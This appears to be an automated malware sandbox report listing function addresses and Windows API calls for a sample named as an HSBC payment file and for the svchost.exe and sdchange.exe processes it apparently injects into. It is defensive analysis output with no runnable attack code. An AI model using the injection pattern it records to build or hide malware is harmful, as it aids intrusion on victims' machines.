            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72F30 NtCreateSection,LdrInitializeThunk,5_2_04D72F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72AD0 NtReadFile,LdrInitializeThunk,5_2_04D72AD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72AF0 NtWriteFile,LdrInitializeThunk,5_2_04D72AF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D72BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04D72BE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04D72BA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72B60 NtClose,LdrInitializeThunk,5_2_04D72B60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D735C0 NtCreateMutant,LdrInitializeThunk,5_2_04D735C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D739B0 NtGetContextThread,LdrInitializeThunk,5_2_04D739B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72CC0 NtQueryVirtualMemory,5_2_04D72CC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72CF0 NtOpenProcess,5_2_04D72CF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72C00 NtQueryInformationProcess,5_2_04D72C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72DB0 NtEnumerateKey,5_2_04D72DB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72D00 NtSetInformationFile,5_2_04D72D00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72EA0 NtAdjustPrivilegesToken,5_2_04D72EA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72E30 NtWriteVirtualMemory,5_2_04D72E30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72F90 NtProtectVirtualMemory,5_2_04D72F90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72FA0 NtQuerySection,5_2_04D72FA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72F60 NtCreateProcessEx,5_2_04D72F60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72AB0 NtWaitForSingleObject,5_2_04D72AB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72B80 NtQueryInformationFile,5_2_04D72B80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D73090 NtSetValueKey,5_2_04D73090
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D73010 NtOpenDirectoryObject,5_2_04D73010
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D73D70 NtOpenThread,5_2_04D73D70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D73D10 NtOpenProcessToken,5_2_04D73D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E28AC0 NtCreateFile,5_2_02E28AC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E28F30 NtAllocateVirtualMemory,5_2_02E28F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E28C30 NtReadFile,5_2_02E28C30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E28DD0 NtClose,5_2_02E28DD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_02E28D20 NtDeleteFile,5_2_02E28D20
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0078A1EF
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00778310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00778310
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007851BD
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0072E6A00_2_0072E6A0
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0074D9750_2_0074D975
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007421C50_2_007421C5
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007562D20_2_007562D2
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007A03DA0_2_007A03DA
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0075242E0_2_0075242E
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007425FA0_2_007425FA
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0077E6160_2_0077E616
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007366E10_2_007366E1
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0075878F0_2_0075878F
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007A08570_2_007A0857
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007568440_2_00756844
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007388080_2_00738808
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007888890_2_00788889
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0074CB210_2_0074CB21
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00756DB60_2_00756DB6
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00736F9E0_2_00736F9E
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007330300_2_00733030
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0074F1D90_2_0074F1D9
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007431870_2_00743187
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007212870_2_00721287
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007414840_2_00741484
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007355200_2_00735520
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007476960_2_00747696
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007357600_2_00735760
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007419780_2_00741978
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00759AB50_2_00759AB5
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0072FCE00_2_0072FCE0
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007A7DDB0_2_007A7DDB
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0074BDA60_2_0074BDA6
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00741D900_2_00741D90
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0072DF000_2_0072DF00
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00733FE00_2_00733FE0
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_01F836000_2_01F83600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011E02_2_004011E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004182232_2_00418223
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010002_2_00401000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030D02_2_004030D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A252_2_00401A25
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A302_2_00401A30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FAC32_2_0040FAC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FABA2_2_0040FABA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023C32_2_004023C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402BD02_2_00402BD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023D02_2_004023D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163BC2_2_004163BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004164032_2_00416403
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FCE32_2_0040FCE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DD632_2_0040DD63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DD072_2_0040DD07
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027E02_2_004027E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E7932_2_0042E793
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_026718F34_2_026718F3
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_026718AC4_2_026718AC
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0266B1D34_2_0266B1D3
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_026736DB4_2_026736DB
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0266AFAA4_2_0266AFAA
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_0266AFB34_2_0266AFB3
            Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exeCode function: 4_2_02689C834_2_02689C83
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DEE4F65_2_04DEE4F6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF24465_2_04DF2446
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DE44205_2_04DE4420
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04E005915_2_04E00591
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D405355_2_04D40535
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D5C6E05_2_04D5C6E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D3C7C05_2_04D3C7C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D647505_2_04D64750
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D407705_2_04D40770
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DD20005_2_04DD2000
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF81CC5_2_04DF81CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04E001AA5_2_04E001AA
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF41A25_2_04DF41A2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DC81585_2_04DC8158
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DDA1185_2_04DDA118
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D301005_2_04D30100
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DC02C05_2_04DC02C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DE02745_2_04DE0274
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04E003E65_2_04E003E6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D4E3F05_2_04D4E3F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFA3525_2_04DFA352
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D30CF25_2_04D30CF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DE0CB55_2_04DE0CB5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D40C005_2_04D40C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D3ADE05_2_04D3ADE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D58DBF5_2_04D58DBF
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DDCD1F5_2_04DDCD1F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D4AD005_2_04D4AD00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFEEDB5_2_04DFEEDB
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D52E905_2_04D52E90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFCE935_2_04DFCE93
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D40E595_2_04D40E59
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFEE265_2_04DFEE26
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D32FC85_2_04D32FC8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D4CFE05_2_04D4CFE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DBEFA05_2_04DBEFA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DB4F405_2_04DB4F40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D60F305_2_04D60F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DE2F305_2_04DE2F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D82F285_2_04D82F28
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D6E8F05_2_04D6E8F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D268B85_2_04D268B8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D4A8405_2_04D4A840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D428405_2_04D42840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04E0A9A65_2_04E0A9A6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D429A05_2_04D429A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D569625_2_04D56962
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D3EA805_2_04D3EA80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF6BD75_2_04DF6BD7
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFAB405_2_04DFAB40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D314605_2_04D31460
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFF43F5_2_04DFF43F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04E095C35_2_04E095C3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DDD5B05_2_04DDD5B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF75715_2_04DF7571
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF16CC5_2_04DF16CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D856305_2_04D85630
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFF7B05_2_04DFF7B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DEF0CC5_2_04DEF0CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D470C05_2_04D470C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF70E95_2_04DF70E9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFF0E05_2_04DFF0E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D4B1B05_2_04D4B1B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04E0B16B5_2_04E0B16B
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D2F1725_2_04D2F172
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D7516C5_2_04D7516C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D5B2C05_2_04D5B2C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DE12ED5_2_04DE12ED
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D452A05_2_04D452A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D8739A5_2_04D8739A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D2D34C5_2_04D2D34C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF132D5_2_04DF132D
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFFCF25_2_04DFFCF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DB9C325_2_04DB9C32
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D5FDC05_2_04D5FDC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF1D5A5_2_04DF1D5A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D43D405_2_04D43D40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DF7D735_2_04DF7D73
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D49EB05_2_04D49EB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D03FD25_2_04D03FD2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D03FD55_2_04D03FD5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D41F925_2_04D41F92
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFFFB15_2_04DFFFB1
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DFFF095_2_04DFFF09
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D438E05_2_04D438E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DAD8005_2_04DAD800
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D499505_2_04D49950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D5B9505_2_04D5B950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04DD59105_2_04DD5910
